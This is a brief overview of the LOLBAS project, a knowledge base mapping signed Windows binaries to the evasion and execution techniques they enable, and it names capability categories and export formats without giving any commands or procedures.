LOLBAS is a curated database and knowledge base of signed Windows binaries that can be misused to bypass security restrictions and execute unauthorized code. It serves as a technical registry that maps trusted system files to their functional capabilities and the offensive tactics they enable.
The project distinguishes itself by providing a capability-driven indexing system and a tactics registry that relates legitimate binary functionality to known security evasion techniques. It includes an association layer that links specific system binaries to attack patterns and tactical objectives, providing a reference for security research and threat detection engineering.
The project covers a wide range of operational capabilities, including code execution via signed proxies, credential theft and exfiltration, and defense evasion through the use of alternate data streams. It also encompasses tools for file management, network communication, and the creation of detection signatures to identify abnormal execution patterns of trusted binaries.
The binary data is available for export in JSON, CSV, and YAML formats to facilitate integration with external security tools.
